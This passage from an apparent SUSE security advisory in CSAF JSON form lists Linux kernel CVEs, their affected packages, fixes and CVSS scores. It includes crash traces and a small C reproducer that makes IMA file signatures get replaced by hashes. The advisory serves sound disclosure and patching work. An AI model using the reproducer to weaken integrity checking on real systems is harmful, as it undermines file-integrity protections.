__x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68180",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68180"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix NULL deref in debugfs odm_combine_segments\n\nWhen a connector is connected but inactive (e.g., disabled by desktop\nenvironments), pipe_ctx-\u003estream_res.tg will be destroyed. Then, reading\nodm_combine_segments causes kernel NULL pointer dereference.\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 16 UID: 0 PID: 26474 Comm: cat Not tainted 6.17.0+ #2 PREEMPT(lazy) e6a17af9ee6db7c63e9d90dbe5b28ccab67520c6\n Hardware name: LENOVO 21Q4/LNVNB161216, BIOS PXCN25WW 03/27/2025\n RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu]\n Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 \u003c48\u003e 8b 07 48 8b 80 08 02 00\u003e\n RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286\n RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8\n RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000\n RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0\n R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08\n R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001\n FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n seq_read_iter+0x125/0x490\n ? __alloc_frozen_pages_noprof+0x18f/0x350\n seq_read+0x12c/0x170\n full_proxy_read+0x51/0x80\n vfs_read+0xbc/0x390\n ? __handle_mm_fault+0xa46/0xef0\n ? do_syscall_64+0x71/0x900\n ksys_read+0x73/0xf0\n do_syscall_64+0x71/0x900\n ? count_memcg_events+0xc2/0x190\n ? handle_mm_fault+0x1d7/0x2d0\n ? do_user_addr_fault+0x21a/0x690\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x6c/0x74\n RIP: 0033:0x7f44d4031687\n Code: 48 89 fa 4c 89 df e8 58 b3 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 \u003c5b\u003e c3 0f 1f 80 00 00 00 00\u003e\n RSP: 002b:00007ffdb4b5f0b0 EFLAGS: 00000202 ORIG_RAX: 0000000000000000\n RAX: ffffffffffffffda RBX: 00007f44d3f9f740 RCX: 00007f44d4031687\n RDX: 0000000000040000 RSI: 00007f44d3f5e000 RDI: 0000000000000003\n RBP: 0000000000040000 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007f44d3f5e000\n R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000040000\n \u003c/TASK\u003e\n Modules linked in: tls tcp_diag inet_diag xt_mark ccm snd_hrtimer snd_seq_dummy snd_seq_midi snd_seq_oss snd_seq_midi_event snd_rawmidi snd_seq snd_seq_device x\u003e\n snd_hda_codec_atihdmi snd_hda_codec_realtek_lib lenovo_wmi_helpers think_lmi snd_hda_codec_generic snd_hda_codec_hdmi snd_soc_core kvm snd_compress uvcvideo sn\u003e\n platform_profile joydev amd_pmc mousedev mac_hid sch_fq_codel uinput i2c_dev parport_pc ppdev lp parport nvme_fabrics loop nfnetlink ip_tables x_tables dm_cryp\u003e\n CR2: 0000000000000000\n ---[ end trace 0000000000000000 ]---\n RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu]\n Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 \u003c48\u003e 8b 07 48 8b 80 08 02 00\u003e\n RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286\n RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8\n RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000\n RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0\n R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08\n R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001\n FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0\n PKRU: 55555554\n\nFix this by checking pipe_ctx-\u003e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68180",
"url": "https://www.suse.com/security/cve/CVE-2025-68180"
},
{
"category": "external",
"summary": "SUSE Bug 1255252 for CVE-2025-68180",
"url": "https://bugzilla.suse.com/1255252"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68180"
},
{
"cve": "CVE-2025-68183",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68183"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nima: don\u0027t clear IMA_DIGSIG flag when setting or removing non-IMA xattr\n\nCurrently when both IMA and EVM are in fix mode, the IMA signature will\nbe reset to IMA hash if a program first stores IMA signature in\nsecurity.ima and then writes/removes some other security xattr for the\nfile.\n\nFor example, on Fedora, after booting the kernel with \"ima_appraise=fix\nevm=fix ima_policy=appraise_tcb\" and installing rpm-plugin-ima,\ninstalling/reinstalling a package will not make good reference IMA\nsignature generated. Instead IMA hash is generated,\n\n # getfattr -m - -d -e hex /usr/bin/bash\n # file: usr/bin/bash\n security.ima=0x0404...\n\nThis happens because when setting security.selinux, the IMA_DIGSIG flag\nthat had been set early was cleared. As a result, IMA hash is generated\nwhen the file is closed.\n\nSimilarly, IMA signature can be cleared on file close after removing\nsecurity xattr like security.evm or setting/removing ACL.\n\nPrevent replacing the IMA file signature with a file hash, by preventing\nthe IMA_DIGSIG flag from being reset.\n\nHere\u0027s a minimal C reproducer which sets security.selinux as the last\nstep which can also replaced by removing security.evm or setting ACL,\n\n #include \u003cstdio.h\u003e\n #include \u003csys/xattr.h\u003e\n #include \u003cfcntl.h\u003e\n #include \u003cunistd.h\u003e\n #include \u003cstring.h\u003e\n #include \u003cstdlib.h\u003e\n\n int main() {\n const char* file_path = \"/usr/sbin/test_binary\";\n const char* hex_string = \"030204d33204490066306402304\";\n int length = strlen(hex_string);\n char* ima_attr_value;\n int fd;\n\n fd = open(file_path, O_WRONLY|O_CREAT|O_EXCL, 0644);\n if (fd == -1) {\n perror(\"Error opening file\");\n return 1;\n }\n\n ima_attr_value = (char*)malloc(length / 2 );\n for (int i = 0, j = 0; i \u003c length; i += 2, j++) {\n sscanf(hex_string + i, \"%2hhx\", \u0026ima_attr_value[j]);\n }\n\n if (fsetxattr(fd, \"security.ima\", ima_attr_value, length/2, 0) == -1) {\n perror(\"Error setting extended attribute\");\n close(fd);\n return 1;\n }\n\n const char* selinux_value= \"system_u:object_r:bin_t:s0\";\n if (fsetxattr(fd, \"security.selinux\", selinux_value, strlen(selinux_value), 0) == -1) {\n perror(\"Error setting extended attribute\");\n close(fd);\n return 1;\n }\n\n close(fd);\n\n return 0;\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68183",
"url": "https://www.suse.com/security/cve/CVE-2025-68183"
},
{
"category": "external",
"summary": "SUSE Bug 1255251 for CVE-2025-68183",
"url": "https://bugzilla.suse.com/1255251"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68183"
},
{
"cve": "CVE-2025-68185",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68185"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfs4_setup_readdir(): insufficient locking for -\u003ed_parent-\u003ed_inode dereferencing\n\nTheoretically it\u0027s an oopsable race, but I don\u0027t believe one can manage\nto hit it on real hardware; might become doable on a KVM, but it still\nwon\u0027t be easy to attack.\n\nAnyway, it\u0027s easy to deal with - since xdr_encode_hyper() is just a call of\nput_unaligned_be64(), we can put that under -\u003ed_lock and be done with that.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68185",
"url": "https://www.suse.com/security/cve/CVE-2025-68185"
},
{
"category": "external",
"summary": "SUSE Bug 1255135 for CVE-2025-68185",
"url": "https://bugzilla.suse.com/1255135"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
